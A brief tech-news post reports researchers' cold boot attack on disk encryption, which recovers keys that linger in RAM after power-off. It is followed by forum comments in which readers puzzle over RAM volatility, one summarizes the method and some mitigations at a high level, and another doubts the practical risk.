Researchers Crack Encryption with Cold

Utilizing a little known fact about RAM, researchers have devised a way to crack disk encryption.

The attack takes only a few minutes to conduct and uses the disk encryption key that's stored in the computer's RAM.

The attack works because content as well as encryption keys stored in RAM linger in the system, even after the machine is powered off, enabling an attacker to use the key to collect any content still in RAM after reapplying power to the machine.

"We've broken disk encryption products in exactly the case when they seem to be most important these days: laptops that contain sensitive corporate data or personal information about business customers," said J. Alex Halderman, one of the researchers, in a press release. "Unlike many security problems, this isn't a minor flaw; it is a fundamental limitation in the way these systems were designed."

Successful attacks were performed against Vista's Bitlocker, Apple's FileVault, TrueCrypt, and Linux's dm-crypt.

Via:  Wired News
Tags:  Encryption, Search, Research, Crack, arc, EA, AC, AR, K
mazuki 6 years ago
i was unaware that RAM stored information after being powered off, when did it become non-volatile?

so really it depends on the type of ram you have, hot hot it runs, and the program you use, the safest being truecrypt and dm-crypt of course, depending on what you encrypt with them.

and apple's filevault is less than secure in the first place, not really a challenge for that one. but the rest i'm surprised to see.
werty316 6 years ago

/scratches head.

I wonder how that works as the last time a check RAM is volatile memory so this confuses me. 

recoveringknowitall 6 years ago

[quote user="werty316"]I wonder how that works as the last time a check RAM is volatile memory so this confuses me. [/quote]

Although my understanding on this matter is limited, I do understand the principal of volatile memory so I'm confused too.


jtm55 6 years ago

Hi All,

Beats me.

^Bad_Boy^ 6 years ago
Maybe they meant ROM :)
mazuki 6 years ago
after watching the video, if you click the link at the top, they explain that while the memory information IS lost when power is gone, it's not instant, it works like a capacitor, slowly losing information in a predictable manner.

their method is to remove the ram chip (1 in a laptop) cool it with an upside down compressed air can, plug it into another and then boot to their eHDD with software on it that dumps the ram and then run software that searches and extracts the key.

this method works far better on system volume encryptions than it does on container encryptions....i.e. not entire volumes and you manually mount the object (truecrypt) as when un-mounting, if you were to heavily use your ram, it would overwrite it and clear it out.

pagefiles come into the equation, and it's better to not use them, or clean them out on power down. same with your swap in linux.
Savage Animal 6 years ago

 So really its a joke. You need to actually remove the ram from the encrypted machine, freeze it, then install it in a new machine and run a dump program to retreive the info wanted. If the info is so confidential that it needs to be encrypted the machine is not going to leave the users person to allow the ram to be removed, so what good does that do?

Post a Comment
or Register to comment